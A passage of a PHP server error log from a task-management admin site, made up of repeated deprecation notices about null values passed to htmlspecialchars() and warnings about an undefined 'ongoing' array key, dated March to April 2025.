deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:46:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 18:37:56 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Mar-2025 18:22:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Mar-2025 19:03:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 11:20:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 13:15:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 13:15:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 13:20:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [27-Mar-2025 13:20:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [27-Mar-2025 14:19:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 14:26:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 16:41:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 16:47:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 10:34:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 11:00:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [04-Apr-2025 11:00:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [04-Apr-2025 11:01:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [04-Apr-2025 11:01:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [04-Apr-2025 12:23:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 12:24:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 13:34:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 16:09:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 16:09:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [04-Apr-2025 16:09:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [04-Apr-2025 16:12:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [04-Apr-2025 16:12:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [04-Apr-2025 16:28:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 10:10:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 10:10:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 10:10:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 10:37:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 10:37:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 10:38:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 10:38:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 13:25:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 13:30:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 13:31:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 13:31:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 14:03:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 14:03:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 14:43:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 15:01:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 15:01:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 15:13:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 15:13:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 15:55:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 15:56:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 15:56:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 15:56:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 15:56:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 16:48:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 17:03:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:03:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:15:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:15:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:16:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 17:17:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [07-Apr-2025 17:17:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [07-Apr-2025 17:18:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:18:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:23:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:23:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:24:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:24:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:31:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:31:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:36:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:36:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:40:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:40:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:47:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:47:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 06:45:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 06:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 06:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 10:15:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 10:17:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 10:18:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 10:18:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 10:19:11 